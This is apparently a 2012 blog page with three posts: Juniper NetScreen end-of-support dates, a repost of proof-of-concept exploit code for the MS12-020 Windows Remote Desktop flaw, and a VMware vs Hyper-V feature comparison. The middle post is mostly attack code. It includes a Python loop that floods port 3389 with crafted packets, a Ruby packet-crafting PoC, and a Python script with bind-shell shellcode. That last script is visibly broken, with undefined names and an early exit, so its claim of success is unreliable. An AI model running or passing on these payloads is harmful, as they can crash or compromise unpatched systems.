Nuffnang

Sunday, March 25, 2012

Juniper : NetScreen Security Products EOS Dates & Milestones

The following NetScreen Security products have all been announced as End of Life (EOL). The End of Support (EOS) milestone dates for the five (5) year support model are published below.

Product

EOL Announce Date

Last Order Date

Last Date to Convert Warranty

Same Day Support Discontinued

Next Day Support Discontinued

End of Support

SSG-20-SB-W-JP
SSG-20-SB-W-KR

12/15/11

04/29/12

04/29/13

04/29/13

04/29/14

04/29/16

SSG-5-SB-MW-JP
SSG-5-SB-MW-KR
SSG-5-SB-MW-TW
SSG-5-SH-MW-KR
SSG-5-SH-MW-TW

12/15/11

04/29/12

04/29/13

04/29/13

04/29/14

04/29/16

SSG-5-SB-BTW-JP
SSG-5-SB-BTW-KR
SSG-5-SB-BTW-TW
SSG-5-SH-BTW-KR
SSG-5-SH-BTW-TW

12/15/11

04/29/12

04/29/13

04/29/13

04/29/14

04/29/16

SSG-5-20-PWR-S-J

12/15/11

04/29/12

04/29/13

04/29/13

04/29/14

04/29/16

Enhanced Physical Interface Modules (EPIMs)

11/30/09

05/31/10

05/31/11

05/31/12

05/31/14

05/31/15

NetScreen-5GT

06/30/08

12/31/08

12/31/09

12/31/10

12/31/12

12/31/13

NetScreen-25
NetScreen-50

01/01/08

06/30/08

06/30/09

06/30/10

06/30/12

06/30/13

SSG 520M NEBS
SSG 550M NEBS

01/01/08

06/30/08

06/30/09

06/30/10

06/30/12

06/30/13

SSG 520
SSG 550 (Non-M platforms)

01/01/08

06/30/08

06/30/09

06/30/10

06/30/12

06/30/13

Any product being discontinued will be announced as EOL for up to one hundred-eighty (180) days prior to the discontinuation and end of sale date, also referred to as last order date. On the last order date, products are removed from the price list and are no longer available for purchase.

Support will only be provided for products that convert the new product warranty coverage to a support services contract prior to expiration of the standard warranty, one (1) year after the last order date.

Same Day and Same Day Onsite support services are no longer available two (2) years after product last order date. The following J-Care services offerings are available: Core, CorePlus, Next Day and Next Day Onsite. Please refer to the Juniper published price list for details. The following JNASC service offerings are available: Basic, RTF, AR-5, AR-1, Next Day, and Next Day Onsite. Please refer to the JNASC price list for details.

Next Day and Next Day Onsite support services are no longer available four (4) years after product last order date. Additionally, four (4) years after product last order date is the last date that any support service offerings are available or renewable.

The product reaches End of Support five (5) years after the last order date. No support services contracts are available and the last contract will expire on the published EOS date.

NOTE: Products that reached end of life (EOL) prior to March 1, 2003, Juniper provides hardware support for up to three (3) years from the date the products are discontinued. Legacy products, products from companies acquired by Juniper Networks, the EOS milestones may vary.

Monday, March 19, 2012

POC source code : Vulnerabilities in Remote Desktop Could Allow Remote Code Execution (2671387)





This security update resolves two privately reported vulnerabilities in the Remote Desktop Protocol. The more severe of these vulnerabilities could allow remote code execution if an attacker sends a sequence of specially crafted RDP packets to an affected system. By default, the Remote Desktop Protocol (RDP) is not enabled on any Windows operating system. Systems that do not have RDP enabled are not at risk.

This security update is rated Critical for all supported releases of Microsoft Windows.

Recommendation. The majority of customers have automatic updating enabled and will not need to take any action because this security update will be downloaded and installed automatically. Customers who have not enabled automatic updating need to check for updates and install this update manually.

Windows Patch Release : http://technet.microsoft.com/en-us/security/bulletin/ms12-020

Source Code 1: China

#
# ms12-020 "chinese shit" PoC
#
# tested on winsp3 spanish, from localhost
#
#

import socket
import sys


buf=""
buf+="\x03\x00\x00\x13\x0e\xe0\x00\x00"
buf+="\x00\x00\x00\x01\x00\x08\x00\x00"
buf+="\x00\x00\x00\x03\x00\x01\xd6\x02"
buf+="\xf0\x80\x7f\x65\x82\x01\x94\x04"
buf+="\x01\x01\x04\x01\x01\x01\x01\xff"
buf+="\x30\x19\x02\x04\x00\x00\x00\x00"
buf+="\x02\x04\x00\x00\x00\x02\x02\x04"
buf+="\x00\x00\x00\x00\x02\x04\x00\x00"
buf+="\x00\x01\x02\x04\x00\x00\x00\x00"
buf+="\x02\x04\x00\x00\x00\x01\x02\x02"
buf+="\xff\xff\x02\x04\x00\x00\x00\x02"
buf+="\x30\x19\x02\x04\x00\x00\x00\x01"
buf+="\x02\x04\x00\x00\x00\x01\x02\x04"
buf+="\x00\x00\x00\x01\x02\x04\x00\x00"
buf+="\x00\x01\x02\x04\x00\x00\x00\x00"
buf+="\x02\x04\x00\x00\x00\x01\x02\x02"
buf+="\x04\x20\x02\x04\x00\x00\x00\x02"
buf+="\x30\x1c\x02\x02\xff\xff\x02\x02"
buf+="\xfc\x17\x02\x02\xff\xff\x02\x04"
buf+="\x00\x00\x00\x01\x02\x04\x00\x00"
buf+="\x00\x00\x02\x04\x00\x00\x00\x01"
buf+="\x02\x02\xff\xff\x02\x04\x00\x00"
buf+="\x00\x02\x04\x82\x01\x33\x00\x05"
buf+="\x00\x14\x7c\x00\x01\x81\x2a\x00"
buf+="\x08\x00\x10\x00\x01\xc0\x00\x44"
buf+="\x75\x63\x61\x81\x1c\x01\xc0\xd8"
buf+="\x00\x04\x00\x08\x00\x80\x02\xe0"
buf+="\x01\x01\xca\x03\xaa\x09\x04\x00"
buf+="\x00\xce\x0e\x00\x00\x48\x00\x4f"
buf+="\x00\x53\x00\x54\x00\x00\x00\x00"
buf+="\x00\x00\x00\x00\x00\x00\x00\x00"
buf+="\x00\x00\x00\x00\x00\x00\x00\x00"
buf+="\x00\x00\x00\x00\x00\x04\x00\x00"
buf+="\x00\x00\x00\x00\x00\x0c\x00\x00"
buf+="\x00\x00\x00\x00\x00\x00\x00\x00"
buf+="\x00\x00\x00\x00\x00\x00\x00\x00"
buf+="\x00\x00\x00\x00\x00\x00\x00\x00"
buf+="\x00\x00\x00\x00\x00\x00\x00\x00"
buf+="\x00\x00\x00\x00\x00\x00\x00\x00"
buf+="\x00\x00\x00\x00\x00\x00\x00\x00"
buf+="\x00\x00\x00\x00\x00\x00\x00\x00"
buf+="\x00\x00\x00\x00\x00\x00\x00\x00"
buf+="\x00\x01\xca\x01\x00\x00\x00\x00"
buf+="\x00\x10\x00\x07\x00\x01\x00\x30"
buf+="\x00\x30\x00\x30\x00\x30\x00\x30"
buf+="\x00\x2d\x00\x30\x00\x30\x00\x30"
buf+="\x00\x2d\x00\x30\x00\x30\x00\x30"
buf+="\x00\x30\x00\x30\x00\x30\x00\x30"
buf+="\x00\x2d\x00\x30\x00\x30\x00\x30"
buf+="\x00\x30\x00\x30\x00\x00\x00\x00"
buf+="\x00\x00\x00\x00\x00\x00\x00\x00"
buf+="\x00\x00\x00\x00\x00\x00\x00\x00"
buf+="\x00\x00\x00\x00\x00\x04\xc0\x0c"
buf+="\x00\x0d\x00\x00\x00\x00\x00\x00"
buf+="\x00\x02\xc0\x0c\x00\x1b\x00\x00"
buf+="\x00\x00\x00\x00\x00\x03\xc0\x2c"
buf+="\x00\x03\x00\x00\x00\x72\x64\x70"
buf+="\x64\x72\x00\x00\x00\x00\x00\x80"
buf+="\x80\x63\x6c\x69\x70\x72\x64\x72"
buf+="\x00\x00\x00\xa0\xc0\x72\x64\x70"
buf+="\x73\x6e\x64\x00\x00\x00\x00\x00"
buf+="\xc0\x03\x00\x00\x0c\x02\xf0\x80"
buf+="\x04\x01\x00\x01\x00\x03\x00\x00"
buf+="\x08\x02\xf0\x80\x28\x03\x00\x00"
buf+="\x0c\x02\xf0\x80\x38\x00\x06\x03"
buf+="\xef\x03\x00\x00\x0c\x02\xf0\x80"
buf+="\x38\x00\x06\x03\xeb\x03\x00\x00"
buf+="\x0c\x02\xf0\x80\x38\x00\x06\x03"
buf+="\xec\x03\x00\x00\x0c\x02\xf0\x80"
buf+="\x38\x00\x06\x03\xed\x03\x00\x00"
buf+="\x0c\x02\xf0\x80\x38\x00\x06\x03"
buf+="\xee\x03\x00\x00\x0b\x06\xd0\x00"
buf+="\x00\x12\x34\x00"

HOST = sys.argv[1]
PORT = 3389
for i in range(1000):
s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
s.connect((HOST,PORT))
print "sending: %d bytes" % len(buf)
s.send(buf)
rec = s.recv(100)
print "received: %d bytes" % len(rec)
s.close()

Source Code 2 : Python Code

#!/usr/bin/env python
#############################################################################
# MS12-020 Exploit by Sabu
# sabu@fbi.gov
# Uses FreeRDP
#############################################################################

import struct
import sys
from freerdp import rdpRdp
from freerdp import crypto
from freerdp.rdpRdp import rdpNego

#bind shellcode TCP port 4444
shellcode = '\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90'
shellcode += '\x29\xc9\x83\xe9\xb0\xe8\xff\xff\xff\xff\xc0\x5e\x81\x76\x0e\xe9'
shellcode += '\x4a\xb6\xa9\x83\xee\xfc\xe2\xf4\x15\x20\x5d\xe4\x01\xb3\x49\x56'
shellcode += '\x16\x2a\x3d\xc5\xcd\x6e\x3d\xec\xd5\xc1\xca\xac\x91\x4b\x59\x22'
shellcode += '\xa6\x52\x3d\xf6\xc9\x4b\x5d\xe0\x62\x7e\x3d\xa8\x07\x7b\x76\x30'
shellcode += '\x45\xce\x76\xdd\xee\x8b\x7c\xa4\xe8\x88\x5d\x5d\xd2\x1e\x92\x81'
shellcode += '\x9c\xaf\x3d\xf6\xcd\x4b\x5d\xcf\x62\x46\xfd\x22\xb6\x56\xb7\x42'
shellcode += '\xea\x66\x3d\x20\x85\x6e\xaa\xc8\x2a\x7b\x6d\xcd\x62\x09\x86\x22'
shellcode += '\xa9\x46\x3d\xd9\xf5\xe7\x3d\xe9\xe1\x14\xde\x27\xa7\x44\x5a\xf9'
shellcode += '\x16\x9c\xd0\xfa\x8f\x22\x85\x9b\x81\x3d\xc5\x9b\xb6\x1e\x49\x79'
shellcode += '\x81\x81\x5b\x55\xd2\x1a\x49\x7f\xb6\xc3\x53\xcf\x68\xa7\xbe\xab'
shellcode += '\xbc\x20\xb4\x56\x39\x22\x6f\xa0\x1c\xe7\xe1\x56\x3f\x19\xe5\xfa'
shellcode += '\xba\x19\xf5\xfa\xaa\x19\x49\x79\x8f\x22\xa7\xf5\x8f\x19\x3f\x48'
shellcode += '\x7c\x22\x12\xb3\x99\x8d\xe1\x56\x3f\x20\xa6\xf8\xbc\xb5\x66\xc1'
shellcode += '\x4d\xe7\x98\x40\xbe\xb5\x60\xfa\xbc\xb5\x66\xc1\x0c\x03\x30\xe0'
shellcode += '\xbe\xb5\x60\xf9\xbd\x1e\xe3\x56\x39\xd9\xde\x4e\x90\x8c\xcf\xfe'
shellcode += '\x16\x9c\xe3\x56\x39\x2c\xdc\xcd\x8f\x22\xd5\xc4\x60\xaf\xdc\xf9'
shellcode += '\xb0\x63\x7a\x20\x0e\x20\xf2\x20\x0b\x7b\x76\x5a\x43\xb4\xf4\x84'
shellcode += '\x17\x08\x9a\x3a\x64\x30\x8e\x02\x42\xe1\xde\xdb\x17\xf9\xa0\x56'
shellcode += '\x9c\x0e\x49\x7f\xb2\x1d\xe4\xf8\xb8\x1b\xdc\xa8\xb8\x1b\xe3\xf8'
shellcode += '\x16\x9a\xde\x04\x30\x4f\x78\xfa\x16\x9c\xdc\x56\x16\x7d\x49\x79'
shellcode += '\x62\x1d\x4a\x2a\x2d\x2e\x49\x7f\xbb\xb5\x66\xc1\x19\xc0\xb2\xf6'
shellcode += '\xba\xb5\x60\x56\x39\x4a\xb6\xa9'


#Payload
payload = '\x41\x00\x5c\x00'
payload += '\xeb\x03\x59\xeb\x05\xe8\xf8\xff\xff\xff\x49\x49\x49\x49\x49\x49'
payload += '\x49\x49\x49\x49\x49\x49\x49\x49\x49\x37\x49\x49\x51\x5a\x6a\x68'
payload += '\x58\x30\x41\x31\x50\x42\x41\x6b\x42\x41\x78\x42\x32\x42\x41\x32'
payload += '\x41\x41\x30\x41\x41\x58\x38\x42\x42\x50\x75\x4b\x59\x49\x6c\x43'
payload += '\x5a\x7a\x4b\x32\x6d\x5a\x48\x5a\x59\x69\x6f\x4b\x4f\x39\x6f\x71'
payload += '\x70\x6e\x6b\x62\x4c\x44\x64\x71\x34\x4c\x4b\x62\x65\x75\x6c\x4c'
payload += '\x4b\x63\x4c\x76\x65\x70\x78\x35\x51\x48\x6f\x6c\x4b\x50\x4f\x74'
payload += '\x58\x6e\x6b\x33\x6f\x55\x70\x37\x71\x48\x6b\x57\x39\x6c\x4b\x66'
payload += '\x54\x6e\x6b\x46\x61\x7a\x4e\x47\x41\x6b\x70\x7a\x39\x4c\x6c\x4c'
payload += '\x44\x6f\x30\x62\x54\x44\x47\x38\x41\x4b\x7a\x54\x4d\x44\x41\x4b'
payload += '\x72\x78\x6b\x39\x64\x35\x6b\x53\x64\x75\x74\x46\x48\x72\x55\x79'
payload += '\x75\x6c\x4b\x53\x6f\x76\x44\x44\x41\x48\x6b\x35\x36\x4e\x6b\x54'
payload += '\x4c\x30\x4b\x6c\x4b\x51\x4f\x65\x4c\x65\x51\x38\x6b\x77\x73\x36'
payload += '\x4c\x4e\x6b\x6e\x69\x30\x6c\x66\x44\x45\x4c\x30\x61\x69\x53\x30'
payload += '\x31\x79\x4b\x43\x54\x6c\x4b\x63\x73\x44\x70\x4e\x6b\x77\x30\x66'
payload += '\x6c\x6c\x4b\x72\x50\x45\x4c\x4c\x6d\x4e\x6b\x73\x70\x64\x48\x73'
payload += '\x6e\x55\x38\x6e\x6e\x32\x6e\x34\x4e\x58\x6c\x62\x70\x39\x6f\x6b'
payload += '\x66\x70\x66\x61\x43\x52\x46\x71\x78\x30\x33\x55\x62\x63\x58\x63'
payload += '\x47\x34\x33\x65\x62\x41\x4f\x30\x54\x39\x6f\x4a\x70\x52\x48\x5a'
payload += '\x6b\x38\x6d\x6b\x4c\x75\x6b\x30\x50\x6b\x4f\x6e\x36\x53\x6f\x6f'
payload += '\x79\x4a\x45\x32\x46\x6f\x71\x6a\x4d\x34\x48\x77\x72\x73\x65\x73'
payload += '\x5a\x37\x72\x69\x6f\x58\x50\x52\x48\x4e\x39\x76\x69\x4a\x55\x4c'
payload += '\x6d\x32\x77\x69\x6f\x59\x46\x50\x53\x43\x63\x41\x43\x70\x53\x70'
payload += '\x53\x43\x73\x50\x53\x62\x63\x70\x53\x79\x6f\x6a\x70\x35\x36\x61'
payload += '\x78\x71\x32\x78\x38\x71\x76\x30\x53\x4b\x39\x69\x71\x4d\x45\x33'
payload += '\x58\x6c\x64\x47\x6a\x74\x30\x5a\x67\x43\x67\x79\x6f\x39\x46\x32'
payload += '\x4a\x56\x70\x66\x31\x76\x35\x59\x6f\x58\x50\x32\x48\x4d\x74\x4e'
payload += '\x4d\x66\x4e\x7a\x49\x50\x57\x6b\x4f\x6e\x36\x46\x33\x56\x35\x39'
payload += '\x6f\x78\x50\x33\x58\x6b\x55\x51\x59\x4e\x66\x50\x49\x51\x47\x39'
payload += '\x6f\x48\x56\x32\x70\x32\x74\x62\x74\x46\x35\x4b\x4f\x38\x50\x6e'
payload += '\x73\x55\x38\x4d\x37\x71\x69\x69\x56\x71\x69\x61\x47\x6b\x4f\x6e'
payload += '\x36\x36\x35\x79\x6f\x6a\x70\x55\x36\x31\x7a\x71\x74\x32\x46\x51'
payload += '\x78\x52\x43\x70\x6d\x4f\x79\x4d\x35\x72\x4a\x66\x30\x42\x79\x64'
payload += '\x69\x7a\x6c\x4b\x39\x48\x67\x62\x4a\x57\x34\x4f\x79\x6d\x32\x37'
payload += '\x41\x6b\x70\x7a\x53\x6e\x4a\x69\x6e\x32\x62\x46\x4d\x6b\x4e\x70'
payload += '\x42\x44\x6c\x4c\x53\x6e\x6d\x31\x6a\x64\x78\x4c\x6b\x4e\x4b\x4e'
payload += '\x4b\x43\x58\x70\x72\x69\x6e\x6d\x63\x37\x66\x79\x6f\x63\x45\x73'
payload += '\x74\x4b\x4f\x7a\x76\x63\x6b\x31\x47\x72\x72\x41\x41\x50\x51\x61'
payload += '\x41\x70\x6a\x63\x31\x41\x41\x46\x31\x71\x45\x51\x41\x4b\x4f\x78'
payload += '\x50\x52\x48\x4c\x6d\x79\x49\x54\x45\x38\x4e\x53\x63\x6b\x4f\x6e'
payload += '\x36\x30\x6a\x49\x6f\x6b\x4f\x70\x37\x4b\x4f\x4e\x30\x4e\x6b\x30'
payload += '\x57\x69\x6c\x6b\x33\x4b\x74\x62\x44\x79\x6f\x6b\x66\x66\x32\x6b'
payload += '\x4f\x4e\x30\x53\x58\x58\x70\x4e\x6a\x55\x54\x41\x4f\x52\x73\x4b'
payload += '\x4f\x69\x46\x4b\x4f\x6e\x30\x68';


class SRVSVC_Exploit(Thread):
def __init__(self, target, port=3389):
super(SRVSVC_Exploit, self).__init__()
self.__port = port
self.target = target


def __DCEPacket(self):
print '[-]Connecting'
self.__trans = rdp.transport.cert('rdp_np:%s\\x00\\x89]' % self.target)
self.__trans.connect()
print '[-]connected' % self.target

# Making teh packet
self.__stub='\x01\x00\x00\x00'
self.__stub+='\xd6\x00\x00\x00\x00\x00\x00\x00\xd6\x00\x00\x00'
self.__stub+=shellcode
self.__stub+='\x41\x41\x41\x41\x41\x41\x41\x41'
self.__stub+='\x41\x41\x41\x41\x41\x41\x41\x41'
self.__stub+='\x41\x41\x41\x41\x41\x41\x41\x41'
self.__stub+='\x41\x41\x41\x41\x41\x41\x41\x41'
self.__stub+='\x41\x41\x41\x41\x41\x41\x41\x41'
self.__stub+='\x41\x41\x41\x41\x41\x41\x41\x41'
self.__stub+='\x41\x41\x41\x41\x41\x41\x41\x41'
self.__stub+='\x41\x41\x41\x41\x41\x41\x41\x41'
self.__stub+='\x00\x00\x00\x00'
self.__stub+='\x2f\x00\x00\x00\x00\x00\x00\x00\x2f\x00\x00\x00'
self.__stub+=payload
self.__stub+='\x00\x00\x00\x00'
self.__stub+='\x02\x00\x00\x00\x02\x00\x00\x00'
self.__stub+='\x00\x00\x00\x00\x02\x00\x00\x00'
self.__stub+='\x5c\x00\x00\x00\x01\x00\x00\x00'
self.__stub+='\x01\x00\x00\x00\x90\x90\xb0\x53\x6b\xC0\x28\x03\xd8\xff\xd3'
return


def run(self):
self.__DCEPacket()
self.__dce.call(0x1f, self.__stub)
print '[-]Exploit successfull!...\nTelnet to port 4444 on target machine.'


if __name__ == '__main__':
target = sys.argv[1]
print '\nUsage: %s \n' % sys.argv[0]
sys.exit(-1)

current = SRVSVC_Exploit(target)
current.start()

Source Code 3 : Ruby

#!/usr/bin/env ruby

#
# ms12-020 PoC attempt
#
# NOTE: This was crafted based on a legit connection packet capture and reversing
# a packet capture of the leaked MAPP PoC.
#
# by Joshua J. Drake (jduck)
#

require 'socket'

def send_tpkt(sd, data)
sd.write(make_tpkt(data))
end

def make_tpkt(data)
[
3, # version
0, # reserved
4 + data.length
].pack('CCn') + data
end

def make_x224(data)
[ data.length ].pack('C') + data
end

def make_rdp(type, flags, data)
[ type, flags, 4 + data.length ].pack('CCv') + data
end


host = ARGV.shift

sd = TCPSocket.new(host, 3389)
pkts1 = []

# craft connection request
rdp = make_rdp(1, 0, [ 0 ].pack('V'))
x224_1 = make_x224([
0xe0, # Connection request
0, # ??
0, # SRC-REF
0 # Class : Class 0
].pack('CnnC') + rdp)

pkts1 << make_tpkt(x224_1)


# craft connect-initial
x224_2 = make_x224([
0xf0, # Data / Class 0
0x80 # EOT: True / NR: 0
].pack('CC'))

# mcsCi
target_params = ""+
#"\x02\x01\x00"+ # maxChannelIds
"\x02\x01\x22"+ # maxChannelIds
"\x02\x01\x0a"+ # maxUserIds
"\x02\x01\x00"+ # maxTokenIds
"\x02\x01\x01"+ # numPriorities
"\x02\x01\x00"+ # minThroughput
"\x02\x01\x01"+ # maxHeight
"\x02\x02\xff\xff"+ # maxMCSPDUSize
"\x02\x01\x02" # protocolVersion
min_params = ""+
"\x02\x01\x01"+ # maxChannelIds
"\x02\x01\x01"+ # maxUserIds
"\x02\x01\x01"+ # maxTokenIds
"\x02\x01\x01"+ # numPriorities
"\x02\x01\x00"+ # minThroughput
"\x02\x01\x01"+ # maxHeight
"\x02\x02\x04\x20"+ # maxMCSPDUSize
"\x02\x01\x02" # protocolVersion
max_params = ""+
"\x02\x02\xff\xff"+ # maxChannelIds
"\x02\x02\xfc\x17"+ # maxUserIds
"\x02\x02\xff\xff"+ # maxTokenIds
"\x02\x01\x01"+ # numPriorities
"\x02\x01\x00"+ # minThroughput
"\x02\x01\x01"+ # maxHeight
"\x02\x02\xff\xff"+ # maxMCSPDUSize
"\x02\x01\x02" # protocolVersion

userdata = ""+
# gccCCrq
"\x00\x05\x00\x14"+
"\x7c\x00\x01\x81\x2a\x00\x08\x00\x10\x00\x01\xc0\x00\x44\x75\x63"+"\x61\x81\x1c"+
# clientCoreData
"\x01\xc0"+"\xd8\x00"+ # header (type, len)
"\x04\x00"+"\x08\x00"+ # version
"\x80\x02"+ # desktop width
"\xe0\x01"+ # desktop height
"\x01\xca"+ # color depth
"\x03\xaa"+ # SASSequence
"\x09\x04\x00\x00" + # keyboard layout
"\xce\x0e\x00\x00" + # client build number
# client name
"\x48\x00\x4f\x00\x53\x00\x54\x00\x00\x00\x00\x00\x00\x00\x00\x00"+
"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00"+
"\x04\x00\x00\x00"+ # keyboard type
"\x00\x00\x00\x00"+ # kbd subType
"\x0c\x00\x00\x00"+ # kbd FuncKey
# imeFileName
"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00"+
"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00"+
"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00"+
"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00"+
"\x01\xca"+ # postBeta2ColorDepth
"\x01\x00"+ # clientProductId
"\x00\x00\x00\x00" + # serialNumber
"\x10\x00"+ # highColorDepth
"\x07\x00"+ # supportedColorDepths
"\x01\x00"+ # earlyCapabilityFlags
# clientDigProductId -poc has: "00000-000-0000000-00000"
"\x30\x00\x30\x00\x30\x00\x30\x00\x30\x00\x2d\x00\x30\x00\x30\x00"+
"\x30\x00\x2d\x00\x30\x00\x30\x00\x30\x00\x30\x00\x30\x00\x30\x00"+
"\x30\x00\x2d\x00\x30\x00\x30\x00\x30\x00\x30\x00\x30\x00\x00\x00"+
"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00"+
"\x00"+ # connectionType
"\x00"+ # pad1octet
"\x00\x00\x00\x00"+ # serverSelectedProtocol
"\x04\xc0\x0c\x00"+ # desktopPhysicalWidth
"\x0d\x00\x00\x00"+ # desktopPhysicalHeight
"\x00\x00\x00\x00"+ # reserved
# clientSecurityData
"\x02\xc0"+"\x0c\x00"+ # header (type, len)
"\x1b\x00\x00\x00"+ # encryptionMethods
"\x00\x00\x00\x00"+ # extEncryptionMethods
# clientNetworkData
"\x03\xc0"+"\x2c\x00"+ # header (type, len)
"\x03\x00\x00\x00"+ # channel count!
# channel 0
"rdpdr\x00\x00\x00"+ # name
"\x00\x00\x80\x80"+ # options
# channel 1
"cliprdr\x00"+ # name
"\x00\x00\xa0\xc0"+ # options
# channel 2
"rdpsnd\x00\x00"+ # name
"\x00\x00\x00\xc0" # options
# clientClusterData (not present)
# clientMonitorData (not present)

mcs_data = ""+
"\x04\x01\x01"+ # callingDomainSelector
"\x04\x01\x01"+ # calledDomainSelector
"\x01\x01\xff"+ # upwardFlag
"\x30" + [ target_params.length ].pack('C') + target_params +
"\x30" + [ min_params.length ].pack('C') + min_params +
"\x30" + [ max_params.length ].pack('C') + max_params +
# userData
"\x04\x82" + [ userdata.length ].pack('n') + userdata

mcs = "\x7f\x65\x82" + [ mcs_data.length ].pack('n') # connect-initial (0x65 / 101), length
mcs << mcs_data

pkts1 << make_tpkt(x224_2 + mcs)


# send a special one?
#pkts1 << make_tpkt(x224_2 + "\x04\x01\x00\x01\x00")

# send more pkts! - based on poc
8.times {
pkts1 << make_tpkt(x224_2 + "\x28")
}

#pkts1 << make_tpkt(x224_2 + "\x38\x00\x06\x03\xea")
#pkts1 << make_tpkt(x224_2 + "\x38\x00\x06\x03\xeb")
#pkts1 << make_tpkt(x224_2 + "\x38\x00\x06\x03\xec")
#pkts1 << make_tpkt(x224_2 + "\x38\x00\x06\x03\xed")
#pkts1 << make_tpkt(x224_2 + "\x38\x00\x06\x03\xee")
pkts1 << make_tpkt(x224_2 + "\x38\x00\x06\x03\xf0")
#pkts1 << make_tpkt(x224_2 + "\x38\x00\x06\x03\xf1")
#pkts1 << make_tpkt(x224_2 + "\x38\x00\x06\x03\xf2")
#pkts1 << make_tpkt(x224_2 + "\x38\x00\x06\x03\xf3")

pkts1 << make_tpkt(x224_2 + "\x21\x80")

bigpkt = pkts1.join('')

20.times { |x|
puts "[*] Sending #{x + 1} ..."
sd.write(bigpkt)

send_tpkt(sd, x224_2 + "\x2e\x00\x00\x01")
#send_tpkt(sd, x224_2 + "\x2e\x00\x00\x02")
#send_tpkt(sd, x224_2 + "\x2e\x00\x00\x03")
#send_tpkt(sd, x224_2 + "\x2e\x00\x00\x04")

# read connect-initial response
buf = sd.recv(1500)
# XXX: TODO: check response =)
#puts buf
}

sd.close

Sunday, March 18, 2012

VMware vSphere 5 vs Microsoft Hyper-V 3.0

This article gives an overview of features of Hyper-V 3.0 part of Microsoft Windows Server 8 and compares those with features of VMware vSphere 5.0 enterprise edition.

Microsoft Hyper-V 3.0 promises to offer a lot of new features.

‘ The upcoming Hyper-V 3.0 release that’s included in the next version of Windows Server has closed the technology gap with VMware’s vSphere’

We all know Microsoft is very good at marketing and we also (should) know currently Hyper-V 2.0 is far behind vSphere 5 when looking at features, scalability and enterprise readiness. Also until Windows Server 8 is generally available (GA), we will not know for sure which advertised features will be part of the GA version.

Public and private clouds are in my opinion the IT of the future. Microsoft and VMware both have solutions which enable a cloud computing infrastructure.

Research show the new features of Hyper-V 3.0 and compare it to the feature set of vSphere 5.

The image below shows the features of VMware vSphere 5 Enterprise Plus edition compared to Hyper-V 3.0 as far as I could find out using documentation on the internet.
To show the progress Microsoft has made I also list the current features of Hyper-V 2.0.

The information on features is based on the Windows Server 8 beta which was released at February 29. Some features in the beta are enhanced compared to the developer preview build

  • 1 TB of memory on a virtual machine (up from 512 GB in the Windows Server “8” Developer Preview Build)
  • 64 TB of virtual disk size (up from 16 TB in the Windows Server “8” Developer Preview Build)

Features and license costs are quite easy to compare. But there is more to consider when selecting which solution best fits the demands and budget. This posting provides an overview of several aspects performance, eco-system, reliability, guest support.

Cost of licensing
There is always a lot of focus on costs. Costs have two aspects: the cost in buying something (CAPEX) and the costs for operating something (OPEX).


It is pretty clear that Hyper-V is and will be cheaper than vSphere. Mind the vSphere Essentials Plus edition combined with offers from Veeam are compatative to Hyper-V in cases where no more than three hosts are needed.


While comparing CAPEX is pretty easy, comparing OPEX is difficult. How can you tell that management of a Hyper-V environment will cost more or less effort (=time) than managing a vSphere environment?

However, seeing the big price difference and growing number of features in Hyper-V 3.0 it will be more difficult to convince your boss to start using vSphere instead of ’free’ Hyper-V.
Large enterprises (which all use server virtualization for some time) will not rapidly change to Hyper-V.

Performance
Several benchmarks do not show a significant performance difference between Hyper-V and vSphere.

Eco-system
While smaller infrastructures can do well with just a hypervisor and management, enterprises will need a lot of additional tooling to be able to manage the virtual infrastructure efficiently. VMware is a clear winner here. There are lots of third party solutions supported on vSphere for functions like backup, performance monitoring, disaster recovery, management, virtual appliances etc etc.
Also lots of hardware vendors offer solutions for vSphere.
Microsoft itself has a growing number of solutions part of the System Center Suite to manage both the physical and virtual infrastructure. The eco-system is growing with solutions like Veeam Backup & Replication for Hyper-V backup.

Cloud connectivity
A vSphere private cloud can easily integrated with a public cloud based on vSphere using vCloud Director. In the near future virtual machine can be vMotion-ed form private cloud to public cloud and reverse.
Microsoft has some integration between a private cloud and Azure public cloud using the new System Center App Controller 2012. This software delivers self service for deploying services to either private or public cloud instead of management which vCloud Connector delivers.

Public cloud
For a public cloud additional tooling is needed. Both Microsoft System Center 2012 and VMware software like vCloud Director and vCenter Operations Management Suite offer the ability to build and operate a private cloud.
Microsoft does not offer a chargeback tool like VMware does with Capacity IQ. Also on Lifecycle management and Capacity Management limited functionality is delivered by System Center 2012 products.
Also Microsoft offers limited security solutions between virtual datacenters. VMware has a range of solutions in the vShield family.
SCVMM 2012 combined with Server App-V allows to automatically deploy both virtual machines and server applications like SQL and Internet Information Services.

Microsoft System Center Suite 2012 is licensed per CPU socket in the host while VMware solutions are mostly licensed per VM (vCenter per instance). In most if not all cases VMware has a more expensive solution but delivers a lot of out of the box functionality.

Scalability
Microsoft did a lot of work on scalability. More servers can be part of a cluster and larger servers are supported now. I believe Hyper-V 3.0 and vSphere are quite equal on this. vSphere is still limited to 2 TB virtual disk files which can be an issue for fileservers and databases. Hyper-V 3.0 has a size limit of 16TB when using the new VHDX format.

Reliability
One of the weak spots of Hyper-V 2.0 is storage. Clustered Shared Volumes can have some issues especially when backup are running. Most can be solved by installing hotfixes. Hyper-V 2.0 and SCVMM 2008 do not feel as reliable and robust as ESX and vCenter Server does.
During demos of the Developers Preview of Windows Server 8 and Hyper-V 3.0 I heard some complains about the reliability. We will just have to wait and see how this evolves when Windows Server 8 is released and get experience.

Memory management
While vSphere clearly has a lot more memory techniques which enables a higher consolidation rate on the hosts, it can be argued if this justifies the much higher licensing cost of vSphere. Also internal memory is not that expensive anymore.

Guest support
vSphere supports a wide variety of guest operating systems. If you are running different Linux os or even Netware this is an important feature.

Conclusion
Hyper-V 3.0 with Windows Server 8 and System Center 2012 are going to deliver a lot of value for a relative low price compared to VMware’s solutions. We will have to see how VMware responds. My guess is that prices will drop, vRAM entitlements will be increased or other deals will be offered to lure VMware customers. This could happen end of 2012.